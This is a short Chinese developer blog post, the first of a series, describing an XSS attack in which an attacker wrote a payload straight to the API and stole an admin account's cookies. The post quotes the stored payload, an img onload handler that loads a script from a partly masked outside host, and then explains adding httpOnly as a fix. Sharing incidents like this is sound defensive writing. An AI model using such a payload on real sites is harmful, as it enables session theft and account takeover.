1. 程式人生 > >xss-javascript被攻擊系列--(一)

xss-javascript被攻擊系列--(一)

終於可以擠個空檔,寫寫這些日子的慘痛經歷。

某天產品A突然喊到,admin賬號被盜了,導致金錢丟失了。瞬間頭皮發麻,完蛋了。

趕緊排查可能出現漏洞的地方,在資料庫中找到了攻擊資料如下:

[p][img srC=\"/project//emotion/images/tsj/t_0004.gif\" onload=\"jQuery.getScript('https://x.****.com/kuF4')\"/][/p]

專案中有富文字編輯器,編輯器在提交時已經將指令碼關鍵字過濾掉了。

god! 攻擊者直接攻擊介面,將惡意資料插入到了庫裡,在展示此頁面的資料時必定會載入以及執行程式碼中的相關指令碼。

分析下js指令碼中的內容是直接竊取使用者登入cookies的。

去看專案相關cookies,沒有設定httpOnly,這樣使用者登入資訊對所有站點指令碼就是完全公開的,攻擊者拿到cookies輕而易舉。攻擊內容中新增有吸引力的內容,使用者去訪問有問題網頁的概率會大大增加,使用者丟失資訊是必然。

伺服器端補上了httpOnly屬性,這個洞算是堵上了。

可指令碼還是會執行這個問題得解決呀,怎麼辦呢?下一篇繼續

有什麼好的建議,多多交流喲。